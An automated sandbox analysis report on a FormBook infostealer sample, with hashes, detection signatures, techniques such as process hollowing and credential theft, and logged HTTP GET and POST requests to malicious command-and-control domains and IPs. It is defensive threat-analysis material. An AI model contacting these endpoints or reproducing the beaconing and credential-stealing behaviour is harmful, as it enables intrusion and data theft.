Windows Analysis Report
u8QPnVhq0N.exe

Overview

General Information

Sample Name: u8QPnVhq0N.exe
Original Sample Name: 7de990046a20e6666627273589b014a5.exe
Analysis ID: 830804
MD5: 7de990046a20e6666627273589b014a5
SHA1: 55ebccd35c2329c5816cd0240b0919651ac58321
SHA256: ebce15ad53b98d7aba7f7544ee947e88f58d696e22ca4bc5d15b2ded37b577ac
Tags: 32, exe, Formbook, trojan

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection

Source: u8QPnVhq0N.exe ReversingLabs: Detection: 46%
Source: u8QPnVhq0N.exe Virustotal: Detection: 48%
Source: Yara match File source: 3.2.mcwfy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.mcwfy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: http://www.younrock.com/u2kb/?X51Qjm=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm Avira URL Cloud: Label: malware
Source: http://white-hat.uk/u2kb/?X51Qjm=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0Iy Avira URL Cloud: Label: malware
Source: http://www.thewildphotographer.co.uk/u2kb/www.thewildphotographer.co.uk Avira URL Cloud: Label: malware
Source: http://www.avisrezervee.com/u2kb/www.avisrezervee.com Avira URL Cloud: Label: malware
Source: http://www.thedivinerudraksha.com/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.gritslab.com/u2kb/www.gritslab.com Avira URL Cloud: Label: malware
Source: http://www.energyservicestation.com/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.gritslab.com/u2kb/?X51Qjm=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZuoq3zmdf3x1nRXg==&w6DN_=E0EQSM0RCb349p Avira URL Cloud: Label: malware
Source: http://www.white-hat.uk/u2kb/www.white-hat.uk Avira URL Cloud: Label: malware
Source: http://www.energyservicestation.com/u2kb/www.energyservicestation.com Avira URL Cloud: Label: malware
Source: http://www.un-object.com/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.white-hat.uk/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.shapshit.xyz/u2kb/?X51Qjm=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBg7FEeCQ3NU/ifUg==&w6DN_=E0EQSM0RCb349p Avira URL Cloud: Label: malware
Source: http://www.thewildphotographer.co.uk/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.bitservicesltd.com/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.gritslab.com/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.222ambking.org/u2kb/www.222ambking.org Avira URL Cloud: Label: malware
Source: http://www.fclaimrewardccpointq.shop/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.energyservicestation.com/u2kb/?X51Qjm=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuAI0Y2tVIkdALeFw==&w6DN_=E0EQSM0RCb349p Avira URL Cloud: Label: malware
Source: http://www.fclaimrewardccpointq.shop/u2kb/www.fclaimrewardccpointq.shop Avira URL Cloud: Label: malware
Source: http://www.avisrezervee.com/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.un-object.com/u2kb/www.un-object.com Avira URL Cloud: Label: malware
Source: http://www.shapshit.xyz/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.bitservicesltd.com/u2kb/?X51Qjm=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7WovfMRM9ceCuTm3Q==&w6DN_=E0EQSM0RCb349p Avira URL Cloud: Label: malware
Source: http://www.thedivinerudraksha.com/u2kb/www.thedivinerudraksha.com Avira URL Cloud: Label: malware
Source: http://www.fclaimrewardccpointq.shop Avira URL Cloud: Label: malware
Source: http://www.ecomofietsen.com/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.222ambking.org/u2kb/?X51Qjm=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUehJPYRcFQEZ60O6g==&w6DN_=E0EQSM0RCb349p Avira URL Cloud: Label: malware
Source: http://www.white-hat.uk/u2kb/?X51Qjm=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3g9z1JjJjKyNNZNw==&w6DN_=E0EQSM0RCb349p Avira URL Cloud: Label: malware
Source: http://www.222ambking.org/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.germanreps.com/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.germanreps.com/u2kb/www.germanreps.com Avira URL Cloud: Label: malware
Source: http://www.younrock.com/u2kb/?X51Qjm=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKqxyFLAdmHecJKz/g==&w6DN_=E0EQSM0RCb349p Avira URL Cloud: Label: malware
Source: http://www.younrock.com/u2kb/www.younrock.com Avira URL Cloud: Label: malware
Source: http://thedivinerudraksha.com/u2kb/?X51Qjm=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pR Avira URL Cloud: Label: malware
Source: http://www.younrock.com/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.shapshit.xyz/u2kb/www.shapshit.xyz Avira URL Cloud: Label: malware
Source: http://www.ecomofietsen.com/u2kb/www.ecomofietsen.com Avira URL Cloud: Label: malware
Source: http://www.bitservicesltd.com/u2kb/www.bitservicesltd.com Avira URL Cloud: Label: malware
Source: http://www.thedivinerudraksha.com/u2kb/?X51Qjm=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pvtIMkBqNJDo2oag==&w6DN_=E0EQSM0RCb349p Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe ReversingLabs: Detection: 33%
Source: u8QPnVhq0N.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Joe Sandbox ML: detected
Source: 3.2.mcwfy.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.mcwfy.exe.2080000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: u8QPnVhq0N.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: u8QPnVhq0N.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: cmstp.pdbGCTL source: mcwfy.exe, 00000003.00000002.361655011.0000000000A30000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: mcwfy.exe, 00000001.00000003.313808108.000000001A010000.00000004.00001000.00020000.00000000.sdmp, mcwfy.exe, 00000001.00000003.313302053.0000000019E80000.00000004.00001000.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000003.315528444.0000000000955000.00000004.00000020.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000003.313591714.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000002.361678876.0000000000C0F000.00000040.00001000.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000002.361678876.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000002.568514237.000000000498F000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000003.361053671.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000006.00000002.568514237.0000000004870000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000003.362960613.00000000046DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: mcwfy.exe, mcwfy.exe, 00000003.00000003.315528444.0000000000955000.00000004.00000020.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000003.313591714.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000002.361678876.0000000000C0F000.00000040.00001000.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000002.361678876.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000002.568514237.000000000498F000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000003.361053671.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000006.00000002.568514237.0000000004870000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000003.362960613.00000000046DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cmstp.pdb source: mcwfy.exe, 00000003.00000002.361655011.0000000000A30000.00000040.10000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405D74
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe Code function: 0_2_0040699E FindFirstFileW,FindClose, 0_2_0040699E
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_004089B8 FindFirstFileExW, 1_2_004089B8

Networking

Source: C:\Windows\explorer.exe Network Connect: 85.187.128.34 80
Source: C:\Windows\explorer.exe Network Connect: 91.195.240.94 80
Source: C:\Windows\explorer.exe Domain query: www.un-object.com
Source: C:\Windows\explorer.exe Domain query: www.energyservicestation.com
Source: C:\Windows\explorer.exe Network Connect: 78.141.192.145 80
Source: C:\Windows\explorer.exe Domain query: www.white-hat.uk
Source: C:\Windows\explorer.exe Domain query: www.thewildphotographer.co.uk
Source: C:\Windows\explorer.exe Domain query: www.shapshit.xyz
Source: C:\Windows\explorer.exe Network Connect: 192.185.17.12 80
Source: C:\Windows\explorer.exe Domain query: www.thedivinerudraksha.com
Source: C:\Windows\explorer.exe Network Connect: 199.192.30.147 80
Source: C:\Windows\explorer.exe Domain query: www.bitservicesltd.com
Source: C:\Windows\explorer.exe Domain query: www.younrock.com
Source: C:\Windows\explorer.exe Domain query: www.gritslab.com
Source: C:\Windows\explorer.exe Network Connect: 161.97.163.8 80
Source: C:\Windows\explorer.exe Domain query: www.222ambking.org
Source: C:\Windows\explorer.exe Network Connect: 81.17.29.149 80
Source: C:\Windows\explorer.exe Domain query: www.fclaimrewardccpointq.shop
Source: C:\Windows\explorer.exe Network Connect: 94.176.104.86 80
Source: C:\Windows\explorer.exe Network Connect: 213.145.228.111 80
Source: C:\Windows\explorer.exe Network Connect: 72.14.185.43 80
Source: C:\Windows\explorer.exe DNS query: www.shapshit.xyz
Source: Joe Sandbox View ASN Name: A2HOSTINGUS A2HOSTINGUS
Source: global traffic HTTP traffic detected: GET /u2kb/?X51Qjm=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3g9z1JjJjKyNNZNw==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.white-hat.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?X51Qjm=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZuoq3zmdf3x1nRXg==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.gritslab.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?X51Qjm=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7WovfMRM9ceCuTm3Q==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.bitservicesltd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?X51Qjm=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUehJPYRcFQEZ60O6g==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.222ambking.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?X51Qjm=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuAI0Y2tVIkdALeFw==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.energyservicestation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?X51Qjm=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKqxyFLAdmHecJKz/g==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.younrock.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?X51Qjm=pn+zaWXo7szcfRSxpZYFMSllMpP2ulP+x3705F5u21IqvN9WG9kcUa2nxvPm1UX5MTo8dUhpuHauDgBRPTa20dSRfVLCBC+wQQ==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.thewildphotographer.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?X51Qjm=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBg7FEeCQ3NU/ifUg==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.shapshit.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?X51Qjm=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pvtIMkBqNJDo2oag==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.thedivinerudraksha.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View IP Address: 85.187.128.34 85.187.128.34
Source: Joe Sandbox View IP Address: 91.195.240.94 91.195.240.94
Source: global traffic HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.gritslab.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.gritslab.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.gritslab.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 58 35 31 51 6a 6d 3d 28 66 71 54 47 58 66 5f 6b 4e 50 63 28 71 42 41 48 34 79 65 65 47 71 37 51 76 76 30 28 4b 48 6e 55 46 49 79 6f 36 46 44 47 79 4f 78 31 52 43 64 68 42 69 47 5a 54 69 70 36 4d 43 78 41 63 47 79 67 38 32 47 4b 76 51 30 79 71 62 56 46 4d 4f 67 5a 46 52 4d 6a 4a 7e 30 73 66 28 38 7a 79 58 7a 66 6e 39 50 4a 59 77 36 54 47 71 44 36 43 4e 68 44 53 6d 4f 36 4a 42 39 58 68 68 45 7a 70 39 37 45 71 79 67 43 70 6c 45 44 6a 74 62 50 61 61 41 41 54 74 76 34 66 34 75 37 70 38 65 72 6f 7a 68 36 48 6d 6e 73 54 38 5f 67 6a 6b 49 4a 41 62 6a 6e 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: X51Qjm=(fqTGXf_kNPc(qBAH4yeeGq7Qvv0(KHnUFIyo6FDGyOx1RCdhBiGZTip6MCxAcGyg82GKvQ0yqbVFMOgZFRMjJ~0sf(8zyXzfn9PJYw6TGqD6CNhDSmO6JB9XhhEzp97EqygCplEDjtbPaaAATtv4f4u7p8erozh6HmnsT8_gjkIJAbjng).
Source: global traffic HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.bitservicesltd.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.bitservicesltd.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bitservicesltd.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 58 35 31 51 6a 6d 3d 6d 70 57 4d 4e 78 6e 56 5a 4e 73 76 41 38 57 70 67 5a 41 47 36 57 4f 48 65 36 42 39 76 69 70 59 43 68 71 6c 70 35 61 38 68 32 67 6d 59 35 67 43 6c 64 4d 76 76 66 57 4b 5a 37 52 57 5a 77 79 35 4c 76 33 6e 4d 67 6c 50 31 58 37 68 48 55 4b 31 65 59 4f 54 6b 75 49 34 42 39 55 38 49 63 69 44 7e 52 31 52 35 65 4c 5a 54 62 69 53 72 46 61 6f 57 53 46 55 30 2d 30 6e 67 69 6b 76 74 54 68 53 41 58 46 30 31 57 6f 61 4d 64 32 6c 73 6c 56 70 4c 30 52 56 4c 37 45 30 34 56 7e 66 70 77 52 37 33 61 51 79 4e 64 34 6c 45 50 44 76 62 74 35 59 52 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: X51Qjm=mpWMNxnVZNsvA8WpgZAG6WOHe6B9vipYChqlp5a8h2gmY5gCldMvvfWKZ7RWZwy5Lv3nMglP1X7hHUK1eYOTkuI4B9U8IciD~R1R5eLZTbiSrFaoWSFU0-0ngikvtThSAXF01WoaMd2lslVpL0RVL7E04V~fpwR73aQyNd4lEPDvbt5YRg).
Source: global traffic HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.222ambking.orgConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.222ambking.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.222ambking.org/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 58 35 31 51 6a 6d 3d 46 47 38 4a 49 54 32 5f 67 71 76 79 72 37 63 7a 65 61 49 6e 5a 49 58 77 38 52 49 64 45 76 4d 46 44 59 49 65 55 47 56 63 52 36 57 64 42 46 66 4f 6e 65 6b 48 57 2d 59 56 41 51 76 68 79 6e 57 59 6f 55 50 34 6b 4e 72 75 41 38 74 4f 76 6b 28 51 66 44 65 79 43 34 35 4b 57 48 49 4b 55 62 4e 32 37 58 73 31 48 41 28 50 43 46 44 7a 6f 4b 47 33 38 69 38 46 6e 57 35 76 6e 65 4b 69 58 6a 64 51 35 2d 4f 6d 58 48 7e 46 4a 31 6e 47 62 68 6e 31 61 45 57 42 75 66 6e 4f 76 55 34 51 45 52 4d 49 77 48 43 72 70 42 7a 56 71 64 6e 67 50 4f 67 77 36 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: X51Qjm=FG8JIT2_gqvyr7czeaInZIXw8RIdEvMFDYIeUGVcR6WdBFfOnekHW-YVAQvhynWYoUP4kNruA8tOvk(QfDeyC45KWHIKUbN27Xs1HA(PCFDzoKG38i8FnW5vneKiXjdQ5-OmXH~FJ1nGbhn1aEWBufnOvU4QERMIwHCrpBzVqdngPOgw6Q).
Source: global traffic HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.energyservicestation.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.energyservicestation.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.energyservicestation.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 58 35 31 51 6a 6d 3d 46 49 52 64 59 4b 38 32 4c 68 41 7a 31 6a 42 33 4d 78 4e 54 5a 6f 4c 64 69 36 69 51 50 5a 64 42 37 56 4f 57 36 76 53 4f 54 32 4c 61 66 36 66 4f 31 72 61 75 7e 68 75 74 79 65 6a 42 31 62 6f 6c 75 31 59 42 73 6e 75 4c 70 4c 6b 45 76 38 46 47 58 5a 79 74 41 6e 46 72 76 55 34 70 51 42 6e 46 56 52 68 76 52 55 43 4c 59 6d 6f 52 45 39 50 41 28 7a 37 32 68 6f 61 6e 42 61 74 51 43 34 59 39 71 5f 30 32 76 54 6a 6a 4e 41 4b 46 55 37 73 48 62 36 70 36 4c 4a 65 5a 28 51 66 4f 71 5a 31 74 42 47 68 31 55 6f 28 31 75 51 71 64 6e 74 64 44 6a 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: X51Qjm=FIRdYK82LhAz1jB3MxNTZoLdi6iQPZdB7VOW6vSOT2Laf6fO1rau~hutyejB1bolu1YBsnuLpLkEv8FGXZytAnFrvU4pQBnFVRhvRUCLYmoRE9PA(z72hoanBatQC4Y9q_02vTjjNAKFU7sHb6p6LJeZ(QfOqZ1tBGh1Uo(1uQqdntdDjQ).
Source: global traffic HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.younrock.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.younrock.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.younrock.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 58 35 31 51 6a 6d 3d 35 37 46 76 7a 66 53 6e 68 6b 4f 5f 28 4b 75 55 4d 55 59 6c 38 30 64 6c 58 73 45 77 53 69 63 55 38 56 68 69 33 71 5a 63 59 6d 44 72 4b 2d 45 35 4e 69 31 42 50 53 55 68 6c 46 68 74 36 6e 36 6e 57 64 50 4f 30 70 66 69 38 57 42 56 37 50 37 6d 61 4c 76 76 35 32 6a 39 43 31 6e 6f 49 62 36 4b 35 67 64 36 73 69 33 30 52 70 32 30 30 6f 71 58 58 74 53 6d 7e 64 34 48 50 35 69 45 72 39 46 46 6f 33 67 67 4b 70 75 79 48 6b 33 46 41 70 73 7a 62 4b 66 67 62 41 75 47 52 54 4e 32 71 37 50 4d 75 68 76 47 51 43 32 54 39 6e 64 67 52 71 76 48 56 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: X51Qjm=57FvzfSnhkO_(KuUMUYl80dlXsEwSicU8Vhi3qZcYmDrK-E5Ni1BPSUhlFht6n6nWdPO0pfi8WBV7P7maLvv52j9C1noIb6K5gd6si30Rp200oqXXtSm~d4HP5iEr9FFo3ggKpuyHk3FApszbKfgbAuGRTN2q7PMuhvGQC2T9ndgRqvHVA).
Source: global traffic HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.thewildphotographer.co.ukConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.thewildphotographer.co.ukUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thewildphotographer.co.uk/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 58 35 31 51 6a 6d 3d 6b 6c 57 54 5a 69 48 63 31 4e 71 36 63 67 6a 71 31 4a 64 38 5a 52 4e 35 62 61 48 6c 79 46 44 35 30 69 7a 48 34 69 51 70 67 6e 64 39 74 4f 45 70 52 4e 64 78 51 36 65 46 70 74 66 47 30 45 66 4c 64 42 67 50 4b 55 51 57 68 56 6d 47 56 48 4a 41 57 68 65 50 37 75 4f 75 64 47 28 71 55 6a 43 4f 63 39 75 74 62 6d 51 7a 64 63 34 34 30 62 32 37 32 75 65 6a 56 66 43 6b 6d 61 51 45 32 66 75 55 28 58 53 79 77 79 76 78 44 77 52 31 63 2d 67 53 69 70 57 50 58 79 4d 4f 7e 58 67 34 51 4b 48 7a 4d 43 6a 48 54 45 73 54 28 64 72 31 5a 4b 39 4b 55 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: X51Qjm=klWTZiHc1Nq6cgjq1Jd8ZRN5baHlyFD50izH4iQpgnd9tOEpRNdxQ6eFptfG0EfLdBgPKUQWhVmGVHJAWheP7uOudG(qUjCOc9utbmQzdc440b272uejVfCkmaQE2fuU(XSywyvxDwR1c-gSipWPXyMO~Xg4QKHzMCjHTEsT(dr1ZK9KUA).
Source: global traffic HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.shapshit.xyzConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.shapshit.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.shapshit.xyz/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 58 35 31 51 6a 6d 3d 56 66 52 78 77 52 51 41 62 39 68 53 34 69 67 43 61 62 55 4f 74 73 43 58 33 33 37 34 75 70 74 46 36 39 4a 35 4d 6c 6f 58 38 52 7e 61 54 43 34 79 43 55 59 6d 74 76 4f 59 54 30 43 77 77 6b 57 62 67 30 4e 56 77 59 62 34 7e 47 46 35 64 4f 36 41 56 59 74 5a 39 32 6b 78 63 42 54 62 54 50 69 76 48 63 4d 59 6b 54 72 72 78 4c 56 52 43 47 31 78 6a 77 73 31 76 30 6c 34 6d 5a 38 61 36 64 48 79 45 43 58 4a 4f 58 4a 77 4c 4a 53 48 63 44 34 34 75 70 72 76 4b 6d 79 73 73 36 28 50 45 48 45 72 59 6c 47 45 39 74 32 6e 67 58 30 58 4e 2d 50 33 52 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: X51Qjm=VfRxwRQAb9hS4igCabUOtsCX3374uptF69J5MloX8R~aTC4yCUYmtvOYT0CwwkWbg0NVwYb4~GF5dO6AVYtZ92kxcBTbTPivHcMYkTrrxLVRCG1xjws1v0l4mZ8a6dHyECXJOXJwLJSHcD44uprvKmyss6(PEHErYlGE9t2ngX0XN-P3RA).
